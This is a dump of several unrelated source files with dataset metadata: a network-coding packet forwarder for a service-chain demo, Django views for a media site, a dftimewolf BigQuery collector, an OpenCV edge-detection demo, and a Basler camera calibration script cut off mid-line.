chain_position in range(8) [hop_log] = struct.unpack('!B', header[1:2]) hop_log |= 0b1<<(7-chain_position) header[1:2] = struct.pack('!B', hop_log) if proc_time != None: header.extend(struct.pack('!H', proc_time)) return header def convert_encoder(kodo_object): if not kodo_object: return {'encoder': 0, 'field_size':0, 'symbol_len':0, 'gen_size':0} name = type(kodo_object).__name__ available_encoders = { 'Fulcrum': 1, 'FullVector': 2, 'NoCode': 3, 'OnTheFly': 4, 'Perpetual': 5, 'SlidingWindow': 6, 'SparseFullVector': 7 } available_sizes = {'4':1, '8':2, '16':3} if name[-1] in available_sizes: field_size = available_sizes[name[-1]] name = name[:-1] else: field_size = 0 [encoder] = [available_encoders[i] for i in available_encoders if name.startswith(i)] result = {'encoder': encoder, 'field_size': field_size} result['symbol_len'] = kodo_object.symbol_size() result['gen_size'] = kodo_object.symbols() return result if __name__ == "__main__": if len(sys.argv) > 2: encoder_decoder = sys.argv[1] SYMBOL_SIZE = int(sys.argv[2]) if coding_mode == "encode": if encoder_decoder == "FullVector": fw_fac = kodo.FullVectorEncoderFactoryBinary(GEN_SIZE, SYMBOL_SIZE) elif encoder_decoder == "SlidingWindow": fw_fac = kodo.SlidingWindowEncoderFactoryBinary(GEN_SIZE, SYMBOL_SIZE) redundancy = 10 elif coding_mode in ("decode", "recode") : if encoder_decoder == "FullVector": fw_fac = kodo.FullVectorDecoderFactoryBinary(GEN_SIZE, SYMBOL_SIZE) elif encoder_decoder == "SlidingWindow": fw_fac = kodo.SlidingWindowDecoderFactoryBinary(GEN_SIZE, SYMBOL_SIZE) else: fw_fac = None encoder_info = convert_encoder(fw_fac) JSONL_FILE_PATH = "pd_{}_{}_{}.jsonl".format(encoder_decoder, SYMBOL_SIZE, GEN_SIZE) # Bind sockets and start forwards and backwards processes recv_sock, send_sock = bind_raw_sock_pair(ingress_iface, egress_iface) fw_proc = multiprocessing.Process(target=forwards_forward, args=(recv_sock, send_sock, fw_fac)) fw_proc.start() # Send a ready packet to SFC manager #ctl_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #ctl_sock.bind(('', CTL_PORT)) #echo_proc = multiprocessing.Process(target=echo_listen, args=(ctl_sock,)) #echo_proc.start() #error_rate = test_error_rate((NEXT_IP, CTL_PORT), 50) #logger.debug("Error rate: {}".format(error_rate)) #ctl_sock.sendto(b'ready', (CTL_IP, CTL_PORT)) fw_proc.join() #echo_proc.join()
null
sfc-ostack/demo/sfp/gap_sf_nc.py
gap_sf_nc.py
py
22,269
python
en
code
null
code-starcoder2
83
[ { "api_name": "binascii.unhexlify", "line_number": 32, "usage_type": "call" }, { "api_name": "config.SRC_MAC.replace", "line_number": 32, "usage_type": "call" }, { "api_name": "config.SRC_MAC", "line_number": 32, "usage_type": "name" }, { "api_name": "binascii.unhexlify", "line_number": 33, "usage_type": "call" }, { "api_name": "config.DST_MAC.replace", "line_number": 33, "usage_type": "call" }, { "api_name": "config.DST_MAC", "line_number": 33, "usage_type": "name" }, { "api_name": "logging.INFO", "line_number": 48, "usage_type": "attribute" }, { "api_name": "logging.DEBUG", "line_number": 49, "usage_type": "attribute" }, { "api_name": "logging.ERROR", "line_number": 50, "usage_type": "attribute" }, { "api_name": "logging.getLogger", "line_number": 53, "usage_type": "call" }, { "api_name": "logging.StreamHandler", "line_number": 54, "usage_type": "call" }, { "api_name": "logging.Formatter", "line_number": 55, "usage_type": "call" }, { "api_name": "socket.socket", "line_number": 69, "usage_type": "call" }, { "api_name": "socket.AF_PACKET", "line_number": 70, "usage_type": "attribute" }, { "api_name": "socket.SOCK_RAW", "line_number": 70, "usage_type": "attribute" }, { "api_name": "socket.htons", "line_number": 70, "usage_type": "call" }, { "api_name": "socket.socket", "line_number": 72, "usage_type": "call" }, { "api_name": "socket.AF_PACKET", "line_number": 73, "usage_type": "attribute" }, { "api_name": "socket.SOCK_RAW", "line_number": 73, "usage_type": "attribute" }, { "api_name": "socket.htons", "line_number": 73, "usage_type": "call" }, { "api_name": "socket.error", "line_number": 75, "usage_type": "attribute" }, { "api_name": "sys.exit", "line_number": 77, "usage_type": "call" }, { "api_name": "struct.pack", "line_number": 102, "usage_type": "call" }, { "api_name": "struct.unpack", "line_number": 105, "usage_type": "call" }, { "api_name": "config.BUFFER_SIZE", "line_number": 114, "usage_type": "argument" }, { "api_name": "config.coding_mode", "line_number": 118, "usage_type": "name" }, { "api_name": "config.monitoring_mode", "line_number": 120, "usage_type": "name" }, { "api_name": "config.BUFFER_SIZE", "line_number": 124, "usage_type": "argument" }, { "api_name": "time.perf_counter", "line_number": 126, "usage_type": "call" }, { "api_name": "struct.unpack", "line_number": 128, "usage_type": "call" }, { "api_name": "struct.unpack", "line_number": 133, "usage_type": "call" }, { "api_name": "struct.unpack", "line_number": 136, "usage_type": "call" }, { "api_name": "struct.unpack", "line_number": 141, "usage_type": "call" }, { "api_name": "struct.unpack", "line_number": 148, "usage_type": "call" }, { "api_name": "struct.unpack", "line_number": 149, "usage_type": "call" }, { "api_name": "struct.pack", "line_number": 158, "usage_type": "call" }, { "api_name": "struct.unpack", "line_number": 161, "usage_type": "call" }, { "api_name": "config.coding_mode", "line_number": 169, "usage_type": "name" }, { "api_name": "config.chain_position", "line_number": 170, "usage_type": "name" }, { "api_name": "config.SYMBOL_SIZE", "line_number": 171, "usage_type": "name" }, { "api_name": "config.probing_enabled", "line_number": 193, "usage_type": "name" }, { "api_name": "time.perf_counter", "line_number": 195, "usage_type": "call" }, { "api_name": "config.probing_enabled", "line_number": 199, "usage_type": "name" }, { "api_name": "time.perf_counter", "line_number": 203, "usage_type": "call" }, { "api_name": "config.probing_enabled", "line_number": 205, "usage_type": "name" }, { "api_name": "time.perf_counter", "line_number": 222, "usage_type": "call" }, { "api_name": "config.coding_mode", "line_number": 231, "usage_type": "name" }, { "api_name": "config.monitoring_mode", "line_number": 233, "usage_type": "name" }, { "api_name": "config.chain_position", "line_number": 243, "usage_type": "name" }, { "api_name": "time.perf_counter", "line_number": 250, "usage_type": "call" }, { "api_name": "config.monitoring_mode", "line_number": 269, "usage_type": "name" }, { "api_name": "config.coding_mode", "line_number": 289, "usage_type": "name" }, { "api_name": "time.perf_counter", "line_number": 304, "usage_type": "call" }, { "api_name": "config.chain_position", "line_number": 307, "usage_type": "name" }, { "api_name": "time.perf_counter", "line_number": 314, "usage_type": "call" }, { "api_name": "time.perf_counter", "line_number": 330, "usage_type": "call" }, { "api_name": "config.coding_mode", "line_number": 335, "usage_type": "name" }, { "api_name": "config.monitoring_mode", "line_number": 348, "usage_type": "name" }, { "api_name": "config.GEN_SIZE", "line_number": 352, "usage_type": "argument" }, { "api_name": "config.DECODER_IP_REWRITE", "line_number": 360, "usage_type": "name" }, { "api_name": "socket.inet_aton", "line_number": 361, "usage_type": "call" }, { "api_name": "config.DECODER_IP_REWRITE", "line_number": 361, "usage_type": "argument" }, { "api_name": "time.perf_counter", "line_number": 365, "usage_type": "call" }, { "api_name": "config.monitoring_mode", "line_number": 367, "usage_type": "name" }, { "api_name": "time.perf_counter", "line_number": 381, "usage_type": "call" }, { "api_name": "config.monitoring_mode", "line_number": 385, "usage_type": "name" }, { "api_name": "config.JSONL_FILE_PATH", "line_number": 386, "usage_type": "argument" }, { "api_name": "config.JSONL_FILE_PATH", "line_number": 387, "usage_type": "argument" }, { "api_name": "json.dumps", "line_number": 388, "usage_type": "call" }, { "api_name": "struct.pack", "line_number": 395, "usage_type": "call" }, { "api_name": "struct.pack", "line_number": 400, "usage_type": "call" }, { "api_name": "binascii.hexlify", "line_number": 405, "usage_type": "call" }, { "api_name": "time.perf_counter", "line_number": 410, "usage_type": "call" }, { "api_name": "time.perf_counter", "line_number": 412, "usage_type": "call" }, { "api_name": "struct.pack", "line_number": 414, "usage_type": "call" }, { "api_name": "socket.recvfrom", "line_number": 418, "usage_type": "call" }, { "api_name": "socket.sendto", "line_number": 422, "usage_type": "call" }, { "api_name": "socket.timeout", "line_number": 434, "usage_type": "attribute" }, { "api_name": "socket.socket", "line_number": 439, "usage_type": "call" }, { "api_name": "socket.AF_INET", "line_number": 439, "usage_type": "attribute" }, { "api_name": "socket.SOCK_DGRAM", "line_number": 439, "usage_type": "attribute" }, { "api_name": "threading.Thread", "line_number": 441, "usage_type": "call" }, { "api_name": "time.sleep", "line_number": 445, "usage_type": "call" }, { "api_name": "struct.pack", "line_number": 466, "usage_type": "call" }, { "api_name": "struct.pack", "line_number": 469, "usage_type": "call" }, { "api_name": "struct.unpack", "line_number": 476, "usage_type": "call" }, { "api_name": "struct.unpack", "line_number": 499, "usage_type": "call" }, { "api_name": "struct.unpack", "line_number": 506, "usage_type": "call" }, { "api_name": "struct.pack", "line_number": 508, "usage_type": "call" }, { "api_name": "config.chain_position", "line_number": 509, "usage_type": "name" }, { "api_name": "config.chain_position", "line_number": 510, "usage_type": "name" }, { "api_name": "struct.unpack", "line_number": 511, "usage_type": "call" }, { "api_name": "config.chain_position", "line_number": 512, "usage_type": "name" }, { "api_name": "struct.pack", "line_number": 513, "usage_type": "call" }, { "api_name": "struct.pack", "line_number": 515, "usage_type": "call" }, { "api_name": "sys.argv", "line_number": 553, "usage_type": "attribute" }, { "api_name": "sys.argv", "line_number": 554, "usage_type": "attribute" }, { "api_name": "config.SYMBOL_SIZE", "line_number": 555, "usage_type": "name" }, { "api_name": "sys.argv", "line_number": 555, "usage_type": "attribute" }, { "api_name": "config.coding_mode", "line_number": 557, "usage_type": "name" }, { "api_name": "kodo.FullVectorEncoderFactoryBinary", "line_number": 559, "usage_type": "call" }, { "api_name": "config.GEN_SIZE", "line_number": 559, "usage_type": "argument" }, { "api_name": "config.SYMBOL_SIZE", "line_number": 559, "usage_type": "argument" }, { "api_name": "kodo.SlidingWindowEncoderFactoryBinary", "line_number": 561, "usage_type": "call" }, { "api_name": "config.GEN_SIZE", "line_number": 561, "usage_type": "argument" }, { "api_name": "config.SYMBOL_SIZE", "line_number": 561, "usage_type": "argument" }, { "api_name": "config.coding_mode", "line_number": 563, "usage_type": "name" }, { "api_name": "kodo.FullVectorDecoderFactoryBinary", "line_number": 565, "usage_type": "call" }, { "api_name": "config.GEN_SIZE", "line_number": 565, "usage_type": "argument" }, { "api_name": "config.SYMBOL_SIZE", "line_number": 565, "usage_type": "argument" }, { "api_name": "kodo.SlidingWindowDecoderFactoryBinary", "line_number": 567, "usage_type": "call" }, { "api_name": "config.GEN_SIZE", "line_number": 567, "usage_type": "argument" }, { "api_name": "config.SYMBOL_SIZE", "line_number": 567, "usage_type": "argument" }, { "api_name": "config.JSONL_FILE_PATH", "line_number": 573, "usage_type": "name" }, { "api_name": "config.SYMBOL_SIZE", "line_number": 573, "usage_type": "argument" }, { "api_name": "config.GEN_SIZE", "line_number": 573, "usage_type": "argument" }, { "api_name": "config.ingress_iface", "line_number": 576, "usage_type": "argument" }, { "api_name": "config.egress_iface", "line_number": 576, "usage_type": "argument" }, { "api_name": "multiprocessing.Process", "line_number": 577, "usage_type": "call" } ]
453209211
from django.shortcuts import render from .escenas_youtube import escenas as escenas_youtube from pulp.settings import STATIC_DIR import os from django.http import HttpResponse from PIL import Image n = len(escenas_youtube) escenas = { 'col1': escenas_youtube[:round(n/3)], 'col2': escenas_youtube[round(n/3):round(2*n/3)+1], 'col3': escenas_youtube[round(2*n/3)+1:], } escenas_dict = {e[0]:e[1] for e in escenas_youtube} # Create your views here. def archivos(request): dict_out = {'escenas': escenas} return render(request,'website/archivos.html',context=dict_out) def get_foto(request, imgtype, imgfolder, imgname): imgdir = os.path.join(STATIC_DIR, imgtype, imgfolder, imgname) image_data = open(imgdir, "rb").read() return HttpResponse(image_data, content_type="image/jpg") def fotos(request): dict_out = {'escenas': escenas} tmbdir = os.path.join(STATIC_DIR, 'thumbnails') imgnewdir = os.path.join(STATIC_DIR, 'img_new') ## folders and images folders_img = [] for folder in os.listdir(tmbdir): if os.path.isdir(tmbdir+'/'+folder): imgs = [] for i in os.listdir(imgnewdir+'/'+folder): image = Image.open(imgnewdir+'/'+folder+'/'+i) imgs.append((i, image.width, image.height)) folders_img.append((folder, imgs)) dict_out['folders'] = folders_img # print(dict_out['folders']) return render(request,'website/fotos.html',context=dict_out) def home(request): dict_out = {'escenas': escenas} return render(request,'website/inicio.html',context=dict_out) def inicio(request): dict_out = {'escenas': escenas} return render(request,'website/inicio.html',context=dict_out) def video1(request): dict_out = {'escenas': escenas} return render(request,'website/video1.html',context=dict_out) def video2(request): dict_out = {'escenas': escenas} return render(request,'website/video2.html',context=dict_out) def escena(request, escena_id): dict_out = {'escenas': escenas, 'escena_id':escena_id, 'youtube':escenas_dict[escena_id]} return render(request, 'website/escenas.html', context=dict_out)
null
website/views.py
views.py
py
2,187
python
en
code
null
code-starcoder2
83
[ { "api_name": "escenas_youtube.escenas", "line_number": 8, "usage_type": "argument" }, { "api_name": "escenas_youtube.escenas", "line_number": 10, "usage_type": "name" }, { "api_name": "escenas_youtube.escenas", "line_number": 11, "usage_type": "name" }, { "api_name": "escenas_youtube.escenas", "line_number": 12, "usage_type": "name" }, { "api_name": "escenas_youtube.escenas", "line_number": 15, "usage_type": "name" }, { "api_name": "django.shortcuts.render", "line_number": 21, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 25, "usage_type": "call" }, { "api_name": "pulp.settings.STATIC_DIR", "line_number": 25, "usage_type": "argument" }, { "api_name": "os.path", "line_number": 25, "usage_type": "attribute" }, { "api_name": "django.http.HttpResponse", "line_number": 27, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 32, "usage_type": "call" }, { "api_name": "pulp.settings.STATIC_DIR", "line_number": 32, "usage_type": "argument" }, { "api_name": "os.path", "line_number": 32, "usage_type": "attribute" }, { "api_name": "os.path.join", "line_number": 33, "usage_type": "call" }, { "api_name": "pulp.settings.STATIC_DIR", "line_number": 33, "usage_type": "argument" }, { "api_name": "os.path", "line_number": 33, "usage_type": "attribute" }, { "api_name": "os.listdir", "line_number": 37, "usage_type": "call" }, { "api_name": "os.path.isdir", "line_number": 38, "usage_type": "call" }, { "api_name": "os.path", "line_number": 38, "usage_type": "attribute" }, { "api_name": "os.listdir", "line_number": 40, "usage_type": "call" }, { "api_name": "PIL.Image.open", "line_number": 41, "usage_type": "call" }, { "api_name": "PIL.Image", "line_number": 41, "usage_type": "name" }, { "api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call" }, { "api_name": "django.shortcuts.render", "line_number": 51, "usage_type": "call" }, { "api_name": "django.shortcuts.render", "line_number": 55, "usage_type": "call" }, { "api_name": "django.shortcuts.render", "line_number": 59, "usage_type": "call" }, { "api_name": "django.shortcuts.render", "line_number": 63, "usage_type": "call" }, { "api_name": "django.shortcuts.render", "line_number": 67, "usage_type": "call" } ]
46425629
# -*- coding: utf-8 -*- """Reads logs from a BigQuery table.""" import tempfile from typing import Optional from google.auth import exceptions as google_auth_exceptions from google.cloud import bigquery # type: ignore import google.cloud.exceptions from dftimewolf.lib import module from dftimewolf.lib.containers import containers from dftimewolf.lib.modules import manager as modules_manager from dftimewolf.lib.state import DFTimewolfState class BigQueryCollector(module.BaseModule): """Collector for BigQuery.""" def __init__(self, state: DFTimewolfState, name: Optional[str] = None, critical: bool = False) -> None: """Initializes a GCP logs collector.""" super(BigQueryCollector, self).__init__(state, name=name, critical=critical) self._project_name = "" self._query = "" self._description = "" # pylint: disable=arguments-differ def SetUp(self, project_name: str, query: str, description: str) -> None: """Sets up a BigQuery collector. Args: project_name (str): name of the project that contains the BigQuery tables. query (str): The query to run. description (str): A description of the query. """ self._project_name = project_name self._query = query self._description = description def Process(self) -> None: """Collects data from BigQuery.""" output_file = tempfile.NamedTemporaryFile( mode="w", delete=False, encoding="utf-8", suffix=".jsonl") output_path = output_file.name self.logger.info("Downloading results to {0:s}".format(output_path)) try: if self._project_name: bq_client = bigquery.Client(project=self._project_name) else: bq_client = bigquery.Client() records = bq_client.query(self._query).to_dataframe().to_json( orient="records", lines=True, date_format="iso") output_file.write(records) # pytype: disable=module-attr except google.cloud.exceptions.NotFound as exception: self.ModuleError(f"Error accessing project: {exception!s}", critical=True) # pytype: enable=module-attr except (google_auth_exceptions.DefaultCredentialsError) as exception: self.ModuleError( "Something is wrong with your gcloud access token or " "Application Default Credentials. Try running:\n " "$ gcloud auth application-default login" ) self.ModuleError(exception, critical=True) self.PublishMessage(f'Downloaded logs to {output_path}') output_file.close() bq_report = containers.File(name=self._description, path=output_path) self.state.StoreContainer(bq_report) modules_manager.ModulesManager.RegisterModule(BigQueryCollector)
null
dftimewolf/lib/collectors/bigquery.py
bigquery.py
py
2,737
python
en
code
null
code-starcoder2
83
[ { "api_name": "dftimewolf.lib.module.BaseModule", "line_number": 16, "usage_type": "attribute" }, { "api_name": "dftimewolf.lib.module", "line_number": 16, "usage_type": "name" }, { "api_name": "dftimewolf.lib.state.DFTimewolfState", "line_number": 20, "usage_type": "name" }, { "api_name": "typing.Optional", "line_number": 21, "usage_type": "name" }, { "api_name": "tempfile.NamedTemporaryFile", "line_number": 44, "usage_type": "call" }, { "api_name": "google.cloud.bigquery.Client", "line_number": 51, "usage_type": "call" }, { "api_name": "google.cloud.bigquery", "line_number": 51, "usage_type": "name" }, { "api_name": "google.cloud.bigquery.Client", "line_number": 53, "usage_type": "call" }, { "api_name": "google.cloud.bigquery", "line_number": 53, "usage_type": "name" }, { "api_name": "google.auth.cloud", "line_number": 60, "usage_type": "attribute" }, { "api_name": "google.auth", "line_number": 60, "usage_type": "name" }, { "api_name": "google.auth.exceptions.DefaultCredentialsError", "line_number": 65, "usage_type": "attribute" }, { "api_name": "google.auth.exceptions", "line_number": 65, "usage_type": "name" }, { "api_name": "dftimewolf.lib.containers.containers.File", "line_number": 76, "usage_type": "call" }, { "api_name": "dftimewolf.lib.containers.containers", "line_number": 76, "usage_type": "name" }, { "api_name": "dftimewolf.lib.modules.manager.ModulesManager.RegisterModule", "line_number": 80, "usage_type": "call" }, { "api_name": "dftimewolf.lib.modules.manager.ModulesManager", "line_number": 80, "usage_type": "attribute" }, { "api_name": "dftimewolf.lib.modules.manager", "line_number": 80, "usage_type": "name" } ]
300466291
import cv2 import numpy as np img = cv2.imread('images/gshock.jpg') lap = cv2.Laplacian(img, cv2.CV_64F) sobelx = cv2.Sobel(img, cv2.CV_64F, 1, 0, ksize=5) sobely = cv2.Sobel(img, cv2.CV_64F, 0, 1, ksize=5) edge = cv2.Canny(img, 100, 200) cv2.imshow('ori', img) cv2.imshow('lap', lap) cv2.imshow('sx', sobelx) cv2.imshow('sy', sobely) cv2.imshow('edge', edge) cv2.waitKey(0) cv2.destroyAllWindows()
null
CV/opencv/edge.py
edge.py
py
402
python
en
code
null
code-starcoder2
83
[ { "api_name": "cv2.imread", "line_number": 4, "usage_type": "call" }, { "api_name": "cv2.Laplacian", "line_number": 6, "usage_type": "call" }, { "api_name": "cv2.CV_64F", "line_number": 6, "usage_type": "attribute" }, { "api_name": "cv2.Sobel", "line_number": 7, "usage_type": "call" }, { "api_name": "cv2.CV_64F", "line_number": 7, "usage_type": "attribute" }, { "api_name": "cv2.Sobel", "line_number": 8, "usage_type": "call" }, { "api_name": "cv2.CV_64F", "line_number": 8, "usage_type": "attribute" }, { "api_name": "cv2.Canny", "line_number": 9, "usage_type": "call" }, { "api_name": "cv2.imshow", "line_number": 11, "usage_type": "call" }, { "api_name": "cv2.imshow", "line_number": 12, "usage_type": "call" }, { "api_name": "cv2.imshow", "line_number": 13, "usage_type": "call" }, { "api_name": "cv2.imshow", "line_number": 14, "usage_type": "call" }, { "api_name": "cv2.imshow", "line_number": 15, "usage_type": "call" }, { "api_name": "cv2.waitKey", "line_number": 16, "usage_type": "call" }, { "api_name": "cv2.destroyAllWindows", "line_number": 17, "usage_type": "call" } ]
259982956
from bottle import route,run,template,static_file from markdown_converter import MarkdownConverter from env import * import posixpath converter = MarkdownConverter() @route('/<resource>') def gfmize(resource): html_file_name = markdown_root + resource if (posixpath.splitext(resource)[1] == '.md'): html_file_name = converter.convert(resource) return static_file(html_file_name, root=ms_root) def main(): run(host=ms_host,port=ms_port,debug=ms_debug,reloader=ms_reloader) if __name__ == '__main__': main()
null
markdownserver/__init__.py
__init__.py
py
537
python
en
code
null
code-starcoder2
83
[ { "api_name": "markdown_converter.MarkdownConverter", "line_number": 6, "usage_type": "call" }, { "api_name": "posixpath.splitext", "line_number": 11, "usage_type": "call" }, { "api_name": "bottle.static_file", "line_number": 13, "usage_type": "call" }, { "api_name": "bottle.route", "line_number": 8, "usage_type": "call" }, { "api_name": "bottle.run", "line_number": 16, "usage_type": "call" } ]
229022069
import cv2 import numpy as np import numba from numba import cuda from pypylon import pylon import time import os KEYS = [ 'UL','UR', 'DL', 'DR'] #_______________________________________________________________________________________________________________________________________________ # this Class Yield Frame of Camera #_______________________________________________________________________________________________________________________________________________ class cameraGraber: def __init__(self, idx): tlFactory = pylon.TlFactory.GetInstance() devices = tlFactory.EnumerateDevices() if len(devices) == 0: raise pylon.RuntimeException("No camera present.") else: print('Numbers Of Camera:', len( devices )) #cameras = pylon.InstantCameraArray(len(devices)) self.camera = pylon.InstantCamera() self.camera.Attach(tlFactory.CreateDevice(devices[idx])) self.camera.StartGrabbing()#pylon.GrabStrategy_LatestImageOnly) self.converter = pylon.ImageFormatConverter() #--------------------------------------5----------------------------------------------- self.camera.GainAuto.SetValue('Off') self.camera.GainSelector.SetValue('All') self.camera.GainRaw.SetValue(100) self.camera.GammaSelector.SetValue('User') #cameras['ul'].camera.BlackLevelSelector.SetValue('All') #self.camera.LightSourceSelector.SetValue('Daylight 6500 Kelvin') self.camera.BalanceWhiteAuto.SetValue('Off') self.camera.ColorAdjustmentEnable.SetValue(False) self.camera.ExposureAuto.SetValue('Off') self.camera.ExposureTimeRaw.SetValue(1000) self.camera.ExposureTimeAbs.SetValue(1000) #self.camera.GammaSelect #user #self.camera.BalanceRatioRaw.SetValue(130) #self.camera.LightSourceSelector.Set(4) #self.camera.TriggerMode.SetValue(1) #self.camera.AutoExposureTimeAbsLowerLimit.SetValue(0) #self.camera.BalanceRatioRaw.SetValue(135) #self.camera.ExposureTimeRaw.SetValue(3000) #self.camera.GammaSelector.SetIntValue(1) #self.camera.GainRaw.SetValue(158) #self.camera.DigitalShift.SetValue(3) # converting to opencv bgr format #cameras['ul'].camera.GainRaw.SetValue(80) self.converter.OutputPixelFormat = pylon.PixelType_BGR8packed self.converter.OutputBitAlignment = pylon.OutputBitAlignment_MsbAligned def grabber( self, rotate=None ): i=0 while self.camera.IsGrabbing(): grabResult = self.camera.RetrieveResult(5000, pylon.TimeoutHandling_ThrowException) if grabResult.GrabSucceeded(): # Access the image data image = self.converter.Convert(grabResult) img = image.GetArray() #if rotate != None: # img = cv2.rotate( img, rotate ) yield img #________________________________________________________________________________________________________________________________________ # Main #________________________________________________________________________________________________________________________________________ def getCamerasDict( ul=0, ur=0, dl=0, dr=0): cams={} delay = 0.2 cams['UL'] = cameraGraber(ul) time.sleep(delay) cams['UR'] = cameraGraber(ur) time.sleep(delay) cams['DL'] = cameraGraber(dl) time.sleep(delay) cams['DR'] = cameraGraber(dr) time.sleep(delay) return cams #________________________________________________________________________________________________________________________________________ # Main #________________________________________________________________________________________________________________________________________ def chessPerspectiveCalib(camera, cam_pos, chess_size = (9,6), chess_home_size = 30, border = 2): while True: img = next(camera.grabber(rotate=None)) gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY) ret, corners = cv2.findChessboardCorners(gray, chess_size,None) if not ret: cv2.imshow('image', cv2.resize(img, None, fx=0.5, fy=0.5)) cv2.waitKey(100) continue criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001) corners= cv2.cornerSubPix(gray,corners,(11,11),(-1,-1),criteria) corners = corners.reshape((-1,2)) org_pts = [] if cam_pos == 'UL': org_pts.append( corners[0] ) org_pts.append( corners[chess_size[0] - 1] ) org_pts.append( corners[chess_size[0]*chess_size[1] - chess_size[0]] ) org_pts.append( corners[-1] ) for num,corner in enumerate(org_pts): cv2.circle( img, tuple(corner), 5, (0,0,255), thickness=-1) cv2.putText( img , str(num), tuple(corner), cv2.FONT_HERSHEY_COMPLEX_SMALL, 3, (0,0,255), thickness=2) cv2.imshow('image', cv2.resize( img, None, fx=0.5, fy=0.5)) key = cv2.waitKey(0) if key==ord('n'): continue org_pts = np.array( org_pts, dtype = np.float32) dst_pts = np.array( [[ border * chess_home_size, border * chess_home_size], [(border + chess_size[0]-1)* chess_home_size , border * chess_home_size], [ border * chess_home_size, (border + chess_size[1]-1)* chess_home_size ], [(border + chess_size[0]-1)* chess_home_size, (border + chess_size[1]-1)* chess_home_size]]).astype(np.float32 ) M = cv2.getPerspectiveTransform( org_pts, dst_pts) #dst_h = (2*border + chess_size[1]-1)* chess_home_size #dst_w = (2*border + chess_size[0]-1)* chess_home_size dst_w, dst_h = (2*border + chess_size[0]-1)* chess_home_size, (2*border + chess_size[1]-1)* chess_home_size while True: dst = cv2.warpPerspective( img, M, (dst_w, dst_h)) cv2.imshow('image', cv2.resize(img, None, fx=0.5, fy=0.5 )) cv2.imshow('dst', cv2.resize(dst, None, fx=0.5, fy=0.5 )) key = cv2.waitKey(50) if key == ord('n') or key == 27 or key == ord('y'): cv2.destroyAllWindows() break if key == 27 or key == ord('y'): break class calibration_perspective(): def __init__(self, path, chess_size = (9,6), chess_home_size = 30, border = 2, cam_positions = ['UL', 'UR', 'DL', 'DR'] ): self.chess_size = chess_size self.chess_home_size = chess_home_size self.chess_home_size_px = self.chess_home_size self.border = border self.cam_positions = cam_positions self.path = path self.mtx= {} self.dst_size=[] self.px2mm = 1 def calc_accuracy(self, cameras, debug=True): distances = [] for cam_pose,cam in cameras.items(): while True: img = next( cam.grabber() ) #img = cv2.imread('data/cal_img/cal_1.jpg') gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY) print('Search For Chess') ret, corners = cv2.findChessboardCorners(gray, self.chess_size,None) if debug: cv2.imshow('image', cv2.resize(img, None, fx=0.5, fy=0.5)) cv2.waitKey(10) if not ret: print('Not Find') continue criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001) corners= cv2.cornerSubPix(gray,corners,(11,11),(-1,-1),criteria) corners = corners.reshape((-1,2)) for i in range(len( corners) - self.chess_size[0]): pt1 = corners[i] pt2 = corners[i+1] pt3 = corners[i+self.chess_size[0]] l1 = int( ((pt1[0] - pt2[0])**2 + (pt1[1] - pt2[1])**2)**0.5 ) l2 = int( ((pt1[0] - pt3[0])**2 + (pt1[1] - pt3[1])**2)**0.5 ) distances.append(l1) distances.append(l2) if debug: res = np.copy(img) cv2.circle( res, tuple(pt1), 2, (0,0,255), thickness=-1) cv2.circle( res, tuple(pt2), 2, (0,0,255), thickness=-1) cv2.circle( res, tuple(pt3), 2, (0,0,255), thickness=-1) cv2.putText( res , str(l1), tuple(((pt1 + pt2)/2 + (-10,-10)).astype(np.int32)), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1.2, (0,0,255), thickness=2) cv2.putText( res , str(l2), tuple(((pt1 + pt3)/2 + (-20,5)).astype(np.int32)), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1.2, (0,0,255), thickness=2) cv2.imshow('image', cv2.resize( res, None, fx=0.75, fy=0.75)) key = cv2.waitKey(10) if key == 27: break break distances = np.array([distances]) if debug: cv2.destroyAllWindows() print( 'min px size: ', distances.min()) print( 'accuracy: ',self.chess_home_size / distances.min(),'mm') self.chess_home_size_px = distances.min() self.px2mm = self.chess_home_size / distances.min() #np.savenp.array([self.chess_home_size / distances.min()]) return distances.min(), self.chess_home_size / distances.min() def calc_calibration(self, cameras, debug=True): for cam_pos,cam in cameras.items(): while True: img = next( cam.grabber() ) #img = cv2.imread('data/cal_img/cal_1.jpg') gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY) ret, corners = cv2.findChessboardCorners(gray, self.chess_size,None) #---------------------------------- if debug: cv2.imshow('image', cv2.resize(img, None, fx=0.5, fy=0.5)) cv2.waitKey(10) if not(ret): continue cv2.destroyAllWindows() #---------------------------------- criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001) corners= cv2.cornerSubPix(gray,corners,(11,11),(-1,-1),criteria) corners = corners.reshape((-1,2)) #---------------------------------- if debug: img_ = np.copy(img) for num,corner in enumerate(corners): cv2.circle( img_, tuple(corner), 5, (0,0,255), thickness=-1) cv2.putText( img_ , str(num), tuple(corner), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0,0,255), thickness=2) cv2.imshow('image_all_corners_' + cam_pos, cv2.resize( img_, None, fx=0.5, fy=0.5)) key = cv2.waitKey(0) cv2.destroyAllWindows() if key==ord('n'): continue #---------------------------------- org_pts = [] if cam_pos == 'UL': org_pts.append( corners[0] ) org_pts.append( corners[self.chess_size[0] - 1] ) org_pts.append( corners[self.chess_size[0] * self.chess_size[1] - self.chess_size[0]] ) org_pts.append( corners[-1] ) if cam_pos == 'UR': org_pts.append( corners[self.chess_size[0] * self.chess_size[1] - self.chess_size[0]] ) org_pts.append( corners[0] ) org_pts.append( corners[-1] ) org_pts.append( corners[self.chess_size[0] - 1] ) if cam_pos == 'DL': org_pts.append( corners[self.chess_size[0] - 1] ) org_pts.append( corners[-1] ) org_pts.append( corners[0] ) org_pts.append( corners[self.chess_size[0] * self.chess_size[1] - self.chess_size[0]] ) if cam_pos == 'DR': org_pts.append( corners[-1] ) org_pts.append( corners[self.chess_size[0] * self.chess_size[1] - self.chess_size[0]] ) org_pts.append( corners[self.chess_size[0] - 1] ) org_pts.append( corners[0] ) if debug: img_ = np.copy(img) for num,corner in enumerate(org_pts): cv2.circle( 